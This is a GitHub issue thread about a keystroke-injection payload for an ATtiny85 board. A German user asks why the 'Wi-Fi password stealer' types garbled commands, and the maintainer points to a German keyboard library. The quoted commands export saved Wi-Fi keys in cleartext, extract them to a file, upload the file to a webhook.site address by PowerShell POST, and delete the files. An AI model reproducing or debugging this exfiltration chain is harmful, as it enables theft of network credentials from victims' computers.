### ISSUE TITLE
Incorrect keystroke layout

### ISSUE THREAD

**Issue by UsOrbis** [MTK911/Attiny85#27]
<h2>Hello,</h2>

i am german and therefore have a German button layout. How can I change this so that it works with my button layout?
I used the [WifiKey-Grab_Minimize-of-Shame.ino](https://github.com/MTK911/Attiny85/blob/master/payloads/Wi-Fi%20password%20stealer/WifiKey-Grab_Minimize-of-Shame.ino) code.
There the output in the cmd console is 
`"netsh wlan export profile kez ́clear"`
 instead of 
`"netsh wlan export profile key=clear"`
 or 
`"powershell SelectßString ßPath Wi(.xml ßPattern äkezMaterialä : WißFißPASS"`
 instead of 
`"powershell Select-String -Path Wi*.xml -Pattern 'keyMaterial' > Wi-Fi-PASS"`
 and all the others as well.
<br><br>

<h2>Screenshots</h2>
https://user-images.githubusercontent.com/119355823/204365882-3a663a01-136a-4f47-aaae-09efb9051d1f.png

<br><br>
<h2>Please complete the following information:</h2>

 - OS: [Win10]
 - User Role/Group/Privilege [Administrator]
 - Keyboard layout & Language [QWERTZ & German(https://en.wikipedia.org/wiki/German_keyboard_layout)]
 - in the run window "`notepad -k mode conÖ cols´15 lines´1`"
`etsh wlan export profile kez´clear`
`powershell SelectßString ßPath Wi(.xml ßPattern äkezMaterialä : WißFißPASS`
`powershell InvokeßWebRequest ßUri httpsÖ--webhook.site-87c40ce9ßd60aß450aßb580ß4305684efd5a ßMethod POST ßInFile WißFißPASS` 
`del Wiß( -s -f -q`
`exit`

Thanks in advance :D

Sincerely, UsOrbis

**Comment by MTK911** [comment]
Hi UsOrbis,

You can use the German Digikeyboard library to fix that.  I have found this unofficial one that might work. 
https://github.com/Phoenixthrush/DigistumpArduinoDe
You can use this as an example payload to make changes in the original script:
https://github.com/phoenixthrush/digispark-payloads/blob/main/rickroll.ino

Regards,
MTK
